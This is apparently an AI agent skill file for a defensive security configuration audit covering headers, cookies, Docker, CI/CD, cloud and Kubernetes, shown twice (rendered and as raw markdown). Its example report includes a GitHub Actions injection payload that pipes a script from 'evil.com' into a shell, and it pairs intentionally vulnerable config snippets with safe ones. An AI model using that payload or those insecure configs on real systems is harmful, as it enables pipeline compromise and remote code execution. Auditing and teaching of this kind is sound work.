Perseus Configuration Specialist
Context & Authorization
IMPORTANT: This skill performs security configuration analysis on the user's own codebase. This is defensive security testing to ensure proper security hardening.
Authorization: The user owns this codebase and has explicitly requested this specialized analysis.
Multi-Language & Platform Support
| Category |
Technologies |
| Web Frameworks |
Express, Fastify, Next.js, Go/Gin, PHP/Laravel, Python/FastAPI, Rust/Actix |
| Containers |
Docker, Podman, containerd |
| Orchestration |
Kubernetes, Docker Compose, Docker Swarm |
| CI/CD |
GitHub Actions, GitLab CI, Jenkins, CircleCI, Azure DevOps |
| Cloud |
AWS, GCP, Azure, DigitalOcean, Vercel, Netlify |
| IaC |
Terraform, Pulumi, CloudFormation, Ansible |
Overview
This specialist skill analyzes security configuration including HTTP headers, TLS settings, CORS policies, container security, CI/CD pipelines, and cloud configurations.
When to Use: As part of any security assessment, or specifically when reviewing deployment configuration.
Goal: Ensure all security configurations follow best practices and don't introduce vulnerabilities.
Engagement Mode Compatibility
| Mode |
Specialist Behavior |
PRODUCTION_SAFE |
Configuration and manifest analysis with passive verification |
STAGING_ACTIVE |
Controlled config validation with limited active checks |
LAB_FULL |
Broad environment hardening validation in lab |
LAB_RED_TEAM |
Defensive stress simulation for infra misconfig chains in isolated lab |
Safety Gates (Required)
- Read
deliverables/engagement_profile.md before active infra validation.
- Default to
PRODUCTION_SAFE if engagement mode is missing.
- Enforce kill-switch thresholds and stop on environment instability.
- Never modify live infrastructure state without explicit approval.
Configuration Risks Covered
| Risk |
Description |
Impact |
| Missing Security Headers |
No CSP, HSTS, X-Frame-Options |
XSS, clickjacking |
| CORS Misconfiguration |
Overly permissive origins |
Data theft |
| Insecure Cookies |
Missing Secure, HttpOnly, SameSite |
Session hijacking |
| Debug Mode |
Production debug enabled |
Info disclosure |
| Docker Misconfig |
Root user, privileged mode |
Container escape |
| CI/CD Secrets |
Exposed secrets, injection |
Supply chain attack |
| Cloud Misconfig |
Public buckets, open security groups |
Data breach |
| K8s Insecurity |
No RBAC, privileged pods |
Cluster compromise |
Execution Instructions
Step 0: Mode & Scope Alignment
- Load mode/scope/limits from
deliverables/engagement_profile.md.
- Respect
deliverables/verification_scope.md when present.
- Keep production checks read-only and non-disruptive.
Phase 1: HTTP Security Headers (3 Parallel Agents)
CSP Analyst:
- "Find Content Security Policy configuration across frameworks."
Framework-Specific:
// Express/Helmet
app.use(helmet.contentSecurityPolicy({ directives: {...} }));
// Next.js - next.config.js
headers: [{ key: 'Content-Security-Policy', value: '...' }]
// Go/Gin
c.Header("Content-Security-Policy", "default-src 'self'")
# Django
CSP_DEFAULT_SRC = ("'self'",)
# FastAPI
response.headers["Content-Security-Policy"] = "..."
// Laravel
header('Content-Security-Policy: default-src 'self'');
Security Headers Analyst:
- "Check for all security headers across languages."
Headers to Check:
| Header |
Purpose |
Recommended Value |
| Strict-Transport-Security |
Force HTTPS |
max-age=31536000; includeSubDomains |
| X-Frame-Options |
Prevent clickjacking |
DENY or SAMEORIGIN |
| X-Content-Type-Options |
Prevent MIME sniffing |
nosniff |
| Referrer-Policy |
Control referrer |
strict-origin-when-cross-origin |
| Permissions-Policy |
Limit browser features |
Disable unused features |
Cookie Security Analyst:
- "Find all cookie setting operations across languages."
Patterns:
// Express - Check flags
res.cookie('session', value, { secure: true, httpOnly: true, sameSite: 'strict' });
// Go
http.SetCookie(w, &http.Cookie{Secure: true, HttpOnly: true, SameSite: http.SameSiteStrictMode})
// PHP
setcookie('session', $value, ['secure' => true, 'httponly' => true, 'samesite' => 'Strict']);
# FastAPI/Starlette
response.set_cookie(key, value, secure=True, httponly=True, samesite='strict')
Phase 2: Docker Security Analysis (4 Parallel Agents)
Dockerfile Analyst:
- "Analyze all Dockerfiles for security issues."
Issues to Find:
# VULNERABLE - Running as root
FROM node:18
COPY . .
CMD ["node", "app.js"]
# SAFE - Non-root user
FROM node:18
RUN addgroup -S app && adduser -S app -G app
USER app
COPY --chown=app:app . .
CMD ["node", "app.js"]
Checks:
- Running as root (no USER directive)
- Using
latest tag
- Secrets in build args or ENV
- Unnecessary packages installed
- No health check
- Exposed unnecessary ports
Docker Compose Analyst:
- "Analyze docker-compose files for security issues."
Issues:
# VULNERABLE
services:
app:
privileged: true # Container escape
network_mode: host # No network isolation
volumes:
- /:/host # Host filesystem access
cap_add:
- ALL # All capabilities
# SAFE
services:
app:
read_only: true
security_opt:
- no-new-privileges:true
cap_drop:
- ALL
Container Secrets Analyst:
- "Check for secrets in container configurations."
Patterns:
# VULNERABLE
ENV DATABASE_PASSWORD=secret123
ARG API_KEY=sk-xxx
COPY .env /app/.env
Image Security Analyst:
- "Check base image security and update status."
Checks:
- Using official images
- Pinned versions (not latest)
- Multi-stage builds for smaller attack surface
- Distroless/Alpine for minimal images
Phase 3: CI/CD Security Analysis (4 Parallel Agents)
GitHub Actions Analyst:
- "Analyze GitHub Actions workflows for security issues."
Critical Issues:
# VULNERABLE - Command injection
- run: echo "${{ github.event.issue.title }}"
# SAFE - Use environment variable
- run: echo "$TITLE"
env:
TITLE: ${{ github.event.issue.title }}
# VULNERABLE - Pull request target with checkout
on: pull_request_target
steps:
- uses: actions/checkout@v4
with:
ref: ${{ github.event.pull_request.head.sha }} # Dangerous!
# VULNERABLE - Secrets in logs
- run: curl -H "Authorization: ${{ secrets.API_KEY }}" $URL
Checks:
- Command injection via event data
- Secrets exposure in logs
- Overly permissive permissions
- Using unverified actions
- pull_request_target misuse
GitLab CI Analyst:
- "Analyze .gitlab-ci.yml for security issues."
Issues:
# VULNERABLE
script:
- echo $CI_JOB_TOKEN # Token exposure
- curl "$USER_INPUT" # Injection
# Check for:
# - Unprotected variables
# - Scripts with user input
# - Exposed tokens
Secrets Management Analyst:
- "Check how secrets are managed in CI/CD."
Checks:
- Secrets in workflow files
- Secrets in repository
- Secrets passed to forks
- Secrets in build logs
- Environment variable exposure
Pipeline Permissions Analyst:
- "Check CI/CD permissions and access controls."
GitHub Actions Permissions:
# VULNERABLE - Too permissive
permissions: write-all
# SAFE - Minimal permissions
permissions:
contents: read
pull-requests: write
Phase 4: Cloud Configuration Analysis (4 Parallel Agents)
AWS Configuration Analyst:
- "Analyze AWS configurations for security issues."
Check Files:
*.tf (Terraform)
template.yaml (CloudFormation)
serverless.yml
.aws/ configs
Issues:
# VULNERABLE - Public S3
resource "aws_s3_bucket" "data" {
acl = "public-read"
}
# VULNERABLE - Open security group
resource "aws_security_group" "web" {
ingress {
from_port = 0
to_port = 65535
cidr_blocks = ["0.0.0.0/0"]
}
}
# VULNERABLE - Hardcoded credentials
provider "aws" {
access_key = "AKIA..."
secret_key = "..."
}
GCP/Azure Configuration Analyst:
- "Analyze GCP and Azure configurations."
GCP Issues:
# VULNERABLE - Public GCS
resource "google_storage_bucket_iam_member" "public" {
member = "allUsers"
role = "roles/storage.objectViewer"
}
Serverless Configuration Analyst:
- "Analyze serverless configurations (Vercel, Netlify, AWS Lambda)."
Check:
- Environment variables in config
- Overly permissive IAM roles
- Public function URLs
- Missing authentication
Infrastructure as Code Analyst:
- "Check Terraform, Pulumi, Ansible for security issues."
Terraform Issues:
# VULNERABLE - No encryption
resource "aws_ebs_volume" "data" {
encrypted = false
}
# VULNERABLE - Default VPC
resource "aws_instance" "web" {
# No VPC specified, uses default
}
Phase 5: Kubernetes Security Analysis (4 Parallel Agents)
Pod Security Analyst:
- "Analyze Kubernetes pod/deployment manifests."
Issues:
# VULNERABLE
spec:
containers:
- name: app
securityContext:
privileged: true # Container escape
runAsRoot: true # Root user
allowPrivilegeEscalation: true
volumeMounts:
- mountPath: /host
name: host-root # Host filesystem
# SAFE
spec:
securityContext:
runAsNonRoot: true
runAsUser: 1000
containers:
- name: app
securityContext:
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop: ["ALL"]
RBAC Analyst:
- "Analyze Kubernetes RBAC configurations."
Issues:
# VULNERABLE - Cluster admin to all
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
subjects:
- kind: ServiceAccount
name: default
roleRef:
kind: ClusterRole
name: cluster-admin
Network Policy Analyst:
- "Check Kubernetes network policies."
Issues:
- No network policies (all pods can communicate)
- Overly permissive ingress/egress
- Missing pod selectors
Secrets & ConfigMap Analyst:
- "Analyze Kubernetes secrets management."
Issues:
# VULNERABLE - Plain text secret
apiVersion: v1
kind: Secret
data:
password: cGFzc3dvcmQ= # Base64, not encryption!
# Check for:
# - Secrets in ConfigMaps
# - Unencrypted secrets
# - Secrets mounted as environment variables
# - Missing RBAC on secrets
Phase 6: Application Configuration (3 Parallel Agents)
Debug Mode Analyst:
- "Check for debug/development mode in production configs."
Patterns:
// Node.js
DEBUG = true
NODE_ENV = 'development'
# Django
DEBUG = True
# Flask
app.run(debug=True)
// Laravel
APP_DEBUG=true
// Go
gin.SetMode(gin.DebugMode)
Error Handling Analyst:
- "Check error responses for information disclosure."
Environment Variables Analyst:
- "Check .env files and environment variable handling."
Issues:
- .env files in repository
- Secrets in .env.example
- Missing .env in .gitignore
- Secrets logged
Output Requirements
Create deliverables/config_security_analysis.md:
# Security Configuration Analysis
## Summary
| Category | Checks | Pass | Fail | Critical |
|----------|--------|------|------|----------|
| HTTP Headers | X | Y | Z | W |
| Cookies | X | Y | Z | W |
| Docker | X | Y | Z | W |
| CI/CD | X | Y | Z | W |
| Cloud (AWS/GCP/Azure) | X | Y | Z | W |
| Kubernetes | X | Y | Z | W |
| App Config | X | Y | Z | W |
## Technologies Detected
- Framework: [e.g., Next.js, Go/Gin]
- Container: Docker, Kubernetes
- CI/CD: GitHub Actions
- Cloud: AWS
## Critical Findings
### [CONFIG-001] GitHub Actions Command Injection
**Severity:** Critical
**Location:** `.github/workflows/pr.yml:23`
**Vulnerable Code:**
```yaml
- run: |
echo "PR Title: ${{ github.event.pull_request.title }}"
Attack: Attacker creates PR with title: "; curl evil.com/shell.sh | sh #
Remediation:
- run: echo "PR Title: $TITLE"
env:
TITLE: ${{ github.event.pull_request.title }}
[CONFIG-002] Privileged Docker Container
Severity: Critical
Location: docker-compose.yml:15
Vulnerable Code:
services:
app:
privileged: true
Impact: Container escape, host compromise
[CONFIG-003] Public S3 Bucket
Severity: Critical
Location: terraform/storage.tf:8
Docker Security Checklist
| Check |
Status |
File |
| Non-root user |
FAIL |
Dockerfile |
| No secrets in image |
PASS |
- |
| Pinned base image |
FAIL |
Dockerfile |
| Read-only filesystem |
FAIL |
docker-compose.yml |
| Dropped capabilities |
FAIL |
docker-compose.yml |
CI/CD Security Checklist
| Check |
Status |
File |
| No command injection |
FAIL |
pr.yml |
| Minimal permissions |
FAIL |
build.yml |
| No secrets in logs |
PASS |
- |
| Verified actions only |
WARN |
deploy.yml |
Kubernetes Security Checklist
| Check |
Status |
File |
| Non-root pods |
FAIL |
deployment.yaml |
| Network policies |
MISSING |
- |
| RBAC configured |
WARN |
rbac.yaml |
| Secrets encrypted |
FAIL |
secrets.yaml |
Cloud Security Checklist
| Check |
Status |
Resource |
| No public buckets |
FAIL |
S3: data-bucket |
| Encrypted storage |
PASS |
EBS volumes |
| Restricted security groups |
FAIL |
sg-web |
| No hardcoded credentials |
PASS |
- |
Recommendations
Immediate Actions
- Fix GitHub Actions command injection
- Remove privileged mode from containers
- Make S3 bucket private
- Add USER directive to Dockerfile
Security Hardening
# Recommended Kubernetes securityContext
securityContext:
runAsNonRoot: true
runAsUser: 1000
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop: ["ALL"]
# Recommended GitHub Actions permissions
permissions:
contents: read
pull-requests: write
**Next Step:** Configuration issues are typically binary (secure or not) and don't require exploit verification.
1---2name: perseus-config3description: Security configuration analysis (Headers, CORS, Docker, CI/CD, Cloud, K8s)4---56# Perseus Configuration Specialist78## Context & Authorization910**IMPORTANT:** This skill performs security configuration analysis on the **user's own codebase**. This is defensive security testing to ensure proper security hardening.1112**Authorization:** The user owns this codebase and has explicitly requested this specialized analysis.1314---1516## Multi-Language & Platform Support1718| Category | Technologies |19|----------|--------------|20| Web Frameworks | Express, Fastify, Next.js, Go/Gin, PHP/Laravel, Python/FastAPI, Rust/Actix |21| Containers | Docker, Podman, containerd |22| Orchestration | Kubernetes, Docker Compose, Docker Swarm |23| CI/CD | GitHub Actions, GitLab CI, Jenkins, CircleCI, Azure DevOps |24| Cloud | AWS, GCP, Azure, DigitalOcean, Vercel, Netlify |25| IaC | Terraform, Pulumi, CloudFormation, Ansible |2627---2829## Overview3031This specialist skill analyzes security configuration including HTTP headers, TLS settings, CORS policies, container security, CI/CD pipelines, and cloud configurations.3233**When to Use:** As part of any security assessment, or specifically when reviewing deployment configuration.3435**Goal:** Ensure all security configurations follow best practices and don't introduce vulnerabilities.3637## Engagement Mode Compatibility3839| Mode | Specialist Behavior |40|------|---------------------|41| `PRODUCTION_SAFE` | Configuration and manifest analysis with passive verification |42| `STAGING_ACTIVE` | Controlled config validation with limited active checks |43| `LAB_FULL` | Broad environment hardening validation in lab |44| `LAB_RED_TEAM` | Defensive stress simulation for infra misconfig chains in isolated lab |4546## Safety Gates (Required)47481. Read `deliverables/engagement_profile.md` before active infra validation.492. Default to `PRODUCTION_SAFE` if engagement mode is missing.503. Enforce kill-switch thresholds and stop on environment instability.514. Never modify live infrastructure state without explicit approval.5253## Configuration Risks Covered5455| Risk | Description | Impact |56|------|-------------|--------|57| Missing Security Headers | No CSP, HSTS, X-Frame-Options | XSS, clickjacking |58| CORS Misconfiguration | Overly permissive origins | Data theft |59| Insecure Cookies | Missing Secure, HttpOnly, SameSite | Session hijacking |60| Debug Mode | Production debug enabled | Info disclosure |61| Docker Misconfig | Root user, privileged mode | Container escape |62| CI/CD Secrets | Exposed secrets, injection | Supply chain attack |63| Cloud Misconfig | Public buckets, open security groups | Data breach |64| K8s Insecurity | No RBAC, privileged pods | Cluster compromise |6566## Execution Instructions6768### Step 0: Mode & Scope Alignment6970- Load mode/scope/limits from `deliverables/engagement_profile.md`.71- Respect `deliverables/verification_scope.md` when present.72- Keep production checks read-only and non-disruptive.7374### Phase 1: HTTP Security Headers (3 Parallel Agents)75761. **CSP Analyst:**77 * "Find Content Security Policy configuration across frameworks."7879 **Framework-Specific:**80 ```javascript81 // Express/Helmet82 app.use(helmet.contentSecurityPolicy({ directives: {...} }));8384 // Next.js - next.config.js85 headers: [{ key: 'Content-Security-Policy', value: '...' }]86 ```87 ```go88 // Go/Gin89 c.Header("Content-Security-Policy", "default-src 'self'")90 ```91 ```python92 # Django93 CSP_DEFAULT_SRC = ("'self'",)9495 # FastAPI96 response.headers["Content-Security-Policy"] = "..."97 ```98 ```php99 // Laravel100 header('Content-Security-Policy: default-src 'self'');101 ```1021032. **Security Headers Analyst:**104 * "Check for all security headers across languages."105106 **Headers to Check:**107 | Header | Purpose | Recommended Value |108 |--------|---------|-------------------|109 | Strict-Transport-Security | Force HTTPS | `max-age=31536000; includeSubDomains` |110 | X-Frame-Options | Prevent clickjacking | `DENY` or `SAMEORIGIN` |111 | X-Content-Type-Options | Prevent MIME sniffing | `nosniff` |112 | Referrer-Policy | Control referrer | `strict-origin-when-cross-origin` |113 | Permissions-Policy | Limit browser features | Disable unused features |1141153. **Cookie Security Analyst:**116 * "Find all cookie setting operations across languages."117118 **Patterns:**119 ```javascript120 // Express - Check flags121 res.cookie('session', value, { secure: true, httpOnly: true, sameSite: 'strict' });122 ```123 ```go124 // Go125 http.SetCookie(w, &http.Cookie{Secure: true, HttpOnly: true, SameSite: http.SameSiteStrictMode})126 ```127 ```php128 // PHP129 setcookie('session', $value, ['secure' => true, 'httponly' => true, 'samesite' => 'Strict']);130 ```131 ```python132 # FastAPI/Starlette133 response.set_cookie(key, value, secure=True, httponly=True, samesite='strict')134 ```135136### Phase 2: Docker Security Analysis (4 Parallel Agents)1371381. **Dockerfile Analyst:**139 * "Analyze all Dockerfiles for security issues."140141 **Issues to Find:**142 ```dockerfile143 # VULNERABLE - Running as root144 FROM node:18145 COPY . .146 CMD ["node", "app.js"]147148 # SAFE - Non-root user149 FROM node:18150 RUN addgroup -S app && adduser -S app -G app151 USER app152 COPY --chown=app:app . .153 CMD ["node", "app.js"]154 ```155156 **Checks:**157 - Running as root (no USER directive)158 - Using `latest` tag159 - Secrets in build args or ENV160 - Unnecessary packages installed161 - No health check162 - Exposed unnecessary ports1631642. **Docker Compose Analyst:**165 * "Analyze docker-compose files for security issues."166167 **Issues:**168 ```yaml169 # VULNERABLE170 services:171 app:172 privileged: true # Container escape173 network_mode: host # No network isolation174 volumes:175 - /:/host # Host filesystem access176 cap_add:177 - ALL # All capabilities178179 # SAFE180 services:181 app:182 read_only: true183 security_opt:184 - no-new-privileges:true185 cap_drop:186 - ALL187 ```1881893. **Container Secrets Analyst:**190 * "Check for secrets in container configurations."191192 **Patterns:**193 ```dockerfile194 # VULNERABLE195 ENV DATABASE_PASSWORD=secret123196 ARG API_KEY=sk-xxx197 COPY .env /app/.env198 ```1992004. **Image Security Analyst:**201 * "Check base image security and update status."202203 **Checks:**204 - Using official images205 - Pinned versions (not latest)206 - Multi-stage builds for smaller attack surface207 - Distroless/Alpine for minimal images208209### Phase 3: CI/CD Security Analysis (4 Parallel Agents)2102111. **GitHub Actions Analyst:**212 * "Analyze GitHub Actions workflows for security issues."213214 **Critical Issues:**215 ```yaml216 # VULNERABLE - Command injection217 - run: echo "${{ github.event.issue.title }}"218219 # SAFE - Use environment variable220 - run: echo "$TITLE"221 env:222 TITLE: ${{ github.event.issue.title }}223224 # VULNERABLE - Pull request target with checkout225 on: pull_request_target226 steps:227 - uses: actions/checkout@v4228 with:229 ref: ${{ github.event.pull_request.head.sha }} # Dangerous!230231 # VULNERABLE - Secrets in logs232 - run: curl -H "Authorization: ${{ secrets.API_KEY }}" $URL233 ```234235 **Checks:**236 - Command injection via event data237 - Secrets exposure in logs238 - Overly permissive permissions239 - Using unverified actions240 - pull_request_target misuse2412422. **GitLab CI Analyst:**243 * "Analyze .gitlab-ci.yml for security issues."244245 **Issues:**246 ```yaml247 # VULNERABLE248 script:249 - echo $CI_JOB_TOKEN # Token exposure250 - curl "$USER_INPUT" # Injection251252 # Check for:253 # - Unprotected variables254 # - Scripts with user input255 # - Exposed tokens256 ```2572583. **Secrets Management Analyst:**259 * "Check how secrets are managed in CI/CD."260261 **Checks:**262 - Secrets in workflow files263 - Secrets in repository264 - Secrets passed to forks265 - Secrets in build logs266 - Environment variable exposure2672684. **Pipeline Permissions Analyst:**269 * "Check CI/CD permissions and access controls."270271 **GitHub Actions Permissions:**272 ```yaml273 # VULNERABLE - Too permissive274 permissions: write-all275276 # SAFE - Minimal permissions277 permissions:278 contents: read279 pull-requests: write280 ```281282### Phase 4: Cloud Configuration Analysis (4 Parallel Agents)2832841. **AWS Configuration Analyst:**285 * "Analyze AWS configurations for security issues."286287 **Check Files:**288 - `*.tf` (Terraform)289 - `template.yaml` (CloudFormation)290 - `serverless.yml`291 - `.aws/` configs292293 **Issues:**294 ```hcl295 # VULNERABLE - Public S3296 resource "aws_s3_bucket" "data" {297 acl = "public-read"298 }299300 # VULNERABLE - Open security group301 resource "aws_security_group" "web" {302 ingress {303 from_port = 0304 to_port = 65535305 cidr_blocks = ["0.0.0.0/0"]306 }307 }308309 # VULNERABLE - Hardcoded credentials310 provider "aws" {311 access_key = "AKIA..."312 secret_key = "..."313 }314 ```3153162. **GCP/Azure Configuration Analyst:**317 * "Analyze GCP and Azure configurations."318319 **GCP Issues:**320 ```hcl321 # VULNERABLE - Public GCS322 resource "google_storage_bucket_iam_member" "public" {323 member = "allUsers"324 role = "roles/storage.objectViewer"325 }326 ```3273283. **Serverless Configuration Analyst:**329 * "Analyze serverless configurations (Vercel, Netlify, AWS Lambda)."330331 **Check:**332 - Environment variables in config333 - Overly permissive IAM roles334 - Public function URLs335 - Missing authentication3363374. **Infrastructure as Code Analyst:**338 * "Check Terraform, Pulumi, Ansible for security issues."339340 **Terraform Issues:**341 ```hcl342 # VULNERABLE - No encryption343 resource "aws_ebs_volume" "data" {344 encrypted = false345 }346347 # VULNERABLE - Default VPC348 resource "aws_instance" "web" {349 # No VPC specified, uses default350 }351 ```352353### Phase 5: Kubernetes Security Analysis (4 Parallel Agents)3543551. **Pod Security Analyst:**356 * "Analyze Kubernetes pod/deployment manifests."357358 **Issues:**359 ```yaml360 # VULNERABLE361 spec:362 containers:363 - name: app364 securityContext:365 privileged: true # Container escape366 runAsRoot: true # Root user367 allowPrivilegeEscalation: true368 volumeMounts:369 - mountPath: /host370 name: host-root # Host filesystem371372 # SAFE373 spec:374 securityContext:375 runAsNonRoot: true376 runAsUser: 1000377 containers:378 - name: app379 securityContext:380 allowPrivilegeEscalation: false381 readOnlyRootFilesystem: true382 capabilities:383 drop: ["ALL"]384 ```3853862. **RBAC Analyst:**387 * "Analyze Kubernetes RBAC configurations."388389 **Issues:**390 ```yaml391 # VULNERABLE - Cluster admin to all392 apiVersion: rbac.authorization.k8s.io/v1393 kind: ClusterRoleBinding394 subjects:395 - kind: ServiceAccount396 name: default397 roleRef:398 kind: ClusterRole399 name: cluster-admin400 ```4014023. **Network Policy Analyst:**403 * "Check Kubernetes network policies."404405 **Issues:**406 - No network policies (all pods can communicate)407 - Overly permissive ingress/egress408 - Missing pod selectors4094104. **Secrets & ConfigMap Analyst:**411 * "Analyze Kubernetes secrets management."412413 **Issues:**414 ```yaml415 # VULNERABLE - Plain text secret416 apiVersion: v1417 kind: Secret418 data:419 password: cGFzc3dvcmQ= # Base64, not encryption!420421 # Check for:422 # - Secrets in ConfigMaps423 # - Unencrypted secrets424 # - Secrets mounted as environment variables425 # - Missing RBAC on secrets426 ```427428### Phase 6: Application Configuration (3 Parallel Agents)4294301. **Debug Mode Analyst:**431 * "Check for debug/development mode in production configs."432433 **Patterns:**434 ```javascript435 // Node.js436 DEBUG = true437 NODE_ENV = 'development'438 ```439 ```python440 # Django441 DEBUG = True442 # Flask443 app.run(debug=True)444 ```445 ```php446 // Laravel447 APP_DEBUG=true448 ```449 ```go450 // Go451 gin.SetMode(gin.DebugMode)452 ```4534542. **Error Handling Analyst:**455 * "Check error responses for information disclosure."4564573. **Environment Variables Analyst:**458 * "Check .env files and environment variable handling."459460 **Issues:**461 - .env files in repository462 - Secrets in .env.example463 - Missing .env in .gitignore464 - Secrets logged465466## Output Requirements467468Create `deliverables/config_security_analysis.md`:469470```markdown471# Security Configuration Analysis472473## Summary474| Category | Checks | Pass | Fail | Critical |475|----------|--------|------|------|----------|476| HTTP Headers | X | Y | Z | W |477| Cookies | X | Y | Z | W |478| Docker | X | Y | Z | W |479| CI/CD | X | Y | Z | W |480| Cloud (AWS/GCP/Azure) | X | Y | Z | W |481| Kubernetes | X | Y | Z | W |482| App Config | X | Y | Z | W |483484## Technologies Detected485- Framework: [e.g., Next.js, Go/Gin]486- Container: Docker, Kubernetes487- CI/CD: GitHub Actions488- Cloud: AWS489490## Critical Findings491492### [CONFIG-001] GitHub Actions Command Injection493**Severity:** Critical494**Location:** `.github/workflows/pr.yml:23`495496**Vulnerable Code:**497```yaml498- run: |499 echo "PR Title: ${{ github.event.pull_request.title }}"500```501502**Attack:** Attacker creates PR with title: `"; curl evil.com/shell.sh | sh #`503504**Remediation:**505```yaml506- run: echo "PR Title: $TITLE"507 env:508 TITLE: ${{ github.event.pull_request.title }}509```510511---512513### [CONFIG-002] Privileged Docker Container514**Severity:** Critical515**Location:** `docker-compose.yml:15`516517**Vulnerable Code:**518```yaml519services:520 app:521 privileged: true522```523524**Impact:** Container escape, host compromise525526---527528### [CONFIG-003] Public S3 Bucket529**Severity:** Critical530**Location:** `terraform/storage.tf:8`531532---533534## Docker Security Checklist535| Check | Status | File |536|-------|--------|------|537| Non-root user | FAIL | Dockerfile |538| No secrets in image | PASS | - |539| Pinned base image | FAIL | Dockerfile |540| Read-only filesystem | FAIL | docker-compose.yml |541| Dropped capabilities | FAIL | docker-compose.yml |542543## CI/CD Security Checklist544| Check | Status | File |545|-------|--------|------|546| No command injection | FAIL | pr.yml |547| Minimal permissions | FAIL | build.yml |548| No secrets in logs | PASS | - |549| Verified actions only | WARN | deploy.yml |550551## Kubernetes Security Checklist552| Check | Status | File |553|-------|--------|------|554| Non-root pods | FAIL | deployment.yaml |555| Network policies | MISSING | - |556| RBAC configured | WARN | rbac.yaml |557| Secrets encrypted | FAIL | secrets.yaml |558559## Cloud Security Checklist560| Check | Status | Resource |561|-------|--------|----------|562| No public buckets | FAIL | S3: data-bucket |563| Encrypted storage | PASS | EBS volumes |564| Restricted security groups | FAIL | sg-web |565| No hardcoded credentials | PASS | - |566567## Recommendations568569### Immediate Actions5701. Fix GitHub Actions command injection5712. Remove privileged mode from containers5723. Make S3 bucket private5734. Add USER directive to Dockerfile574575### Security Hardening576```yaml577# Recommended Kubernetes securityContext578securityContext:579 runAsNonRoot: true580 runAsUser: 1000581 allowPrivilegeEscalation: false582 readOnlyRootFilesystem: true583 capabilities:584 drop: ["ALL"]585```586587```yaml588# Recommended GitHub Actions permissions589permissions:590 contents: read591 pull-requests: write592```593```594595**Next Step:** Configuration issues are typically binary (secure or not) and don't require exploit verification.